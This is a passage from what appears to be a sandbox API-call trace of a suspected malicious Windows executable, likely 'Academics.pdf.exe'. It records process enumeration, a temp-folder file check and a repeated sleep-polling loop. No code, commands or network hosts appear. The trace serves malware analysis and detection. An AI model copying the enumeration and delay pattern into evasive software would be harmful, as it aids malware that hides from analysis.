th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0294.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0294.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0294.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0294.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0294.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0294.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0294.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0294.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0294.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0294.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0294.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0294.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0294.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0294.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0294.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0294.469] CloseHandle (hObject=0x294) returned 1 [0294.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0294.469] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0294.470] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.470] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0294.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0294.471] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0294.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0294.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0294.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0294.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0294.472] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0294.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0294.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0294.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0294.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0294.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0294.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0294.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0294.474] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.474] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0294.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0294.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0294.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0294.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.475] timeGetTime () returned 0x499be [0294.475] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.475] Sleep (dwMilliseconds=0xa) [0294.481] timeGetTime () returned 0x499cd [0294.482] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.482] Sleep (dwMilliseconds=0xa) [0294.497] timeGetTime () returned 0x499dd [0294.497] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.497] Sleep (dwMilliseconds=0xa) [0294.513] timeGetTime () returned 0x499ed [0294.513] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.513] Sleep (dwMilliseconds=0xa) [0294.528] timeGetTime () returned 0x499fc [0294.528] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.528] Sleep (dwMilliseconds=0xa) [0294.544] timeGetTime () returned 0x49a0c [0294.544] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.544] Sleep (dwMilliseconds=0xa) [0294.562] timeGetTime () returned 0x49a1b [0294.562] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.562] Sleep (dwMilliseconds=0xa) [0294.575] timeGetTime () returned 0x49a2b [0294.575] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.575] Sleep (dwMilliseconds=0xa) [0294.595] timeGetTime () returned 0x49a3b [0294.595] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.596] Sleep (dwMilliseconds=0xa) [0294.607] timeGetTime () returned 0x49a4a [0294.607] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.607] Sleep (dwMilliseconds=0xa) [0294.622] timeGetTime () returned 0x49a5a [0294.622] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.622] Sleep (dwMilliseconds=0xa) [0294.638] timeGetTime () returned 0x49a69 [0294.638] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.638] Sleep (dwMilliseconds=0xa) [0294.653] timeGetTime () returned 0x49a79 [0294.653] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.653] Sleep (dwMilliseconds=0xa) [0294.669] timeGetTime () returned 0x49a89 [0294.669] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.669] Sleep (dwMilliseconds=0xa) [0294.684] timeGetTime () returned 0x49a98 [0294.684] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.684] Sleep (dwMilliseconds=0xa) [0294.700] timeGetTime () returned 0x49aa8 [0294.700] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.700] Sleep (dwMilliseconds=0xa) [0294.720] timeGetTime () returned 0x49ab7 [0294.720] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.720] Sleep (dwMilliseconds=0xa) [0294.731] timeGetTime () returned 0x49ac7 [0294.731] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.731] Sleep (dwMilliseconds=0xa) [0294.747] timeGetTime () returned 0x49ad7 [0294.747] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.747] Sleep (dwMilliseconds=0xa) [0294.763] timeGetTime () returned 0x49ae6 [0294.763] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.763] Sleep (dwMilliseconds=0xa) [0294.778] timeGetTime () returned 0x49af6 [0294.778] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.778] Sleep (dwMilliseconds=0xa) [0294.796] timeGetTime () returned 0x49b05 [0294.796] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.796] Sleep (dwMilliseconds=0xa) [0294.809] timeGetTime () returned 0x49b15 [0294.809] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.809] Sleep (dwMilliseconds=0xa) [0294.825] timeGetTime () returned 0x49b25 [0294.825] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.825] Sleep (dwMilliseconds=0xa) [0294.840] timeGetTime () returned 0x49b34 [0294.840] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.841] Sleep (dwMilliseconds=0xa) [0294.856] timeGetTime () returned 0x49b44 [0294.856] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.856] Sleep (dwMilliseconds=0xa) [0294.872] timeGetTime () returned 0x49b53 [0294.872] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.872] Sleep (dwMilliseconds=0xa) [0294.887] timeGetTime () returned 0x49b63 [0294.887] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.887] Sleep (dwMilliseconds=0xa) [0294.903] timeGetTime () returned 0x49b73 [0294.903] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.903] Sleep (dwMilliseconds=0xa) [0294.918] timeGetTime () returned 0x49b82 [0294.918] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.918] Sleep (dwMilliseconds=0xa) [0294.934] timeGetTime () returned 0x49b92 [0294.934] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.934] Sleep (dwMilliseconds=0xa) [0294.950] timeGetTime () returned 0x49ba1 [0294.950] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.950] Sleep (dwMilliseconds=0xa) [0294.974] timeGetTime () returned 0x49bb1 [0294.974] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.974] Sleep (dwMilliseconds=0xa) [0294.989] timeGetTime () returned 0x49bc1 [0294.989] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.989] Sleep (dwMilliseconds=0xa) [0294.996] timeGetTime () returned 0x49bd0 [0294.996] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0294.996] Sleep (dwMilliseconds=0xa) [0295.012] timeGetTime () returned 0x49be0 [0295.012] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.012] Sleep (dwMilliseconds=0xa) [0295.028] timeGetTime () returned 0x49bef [0295.028] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.028] Sleep (dwMilliseconds=0xa) [0295.044] timeGetTime () returned 0x49bff [0295.044] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.044] Sleep (dwMilliseconds=0xa) [0295.064] timeGetTime () returned 0x49c0f [0295.064] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.064] Sleep (dwMilliseconds=0xa) [0295.074] timeGetTime () returned 0x49c1e [0295.074] PeekMessageW (in: lpMsg=0x8bf7a0, 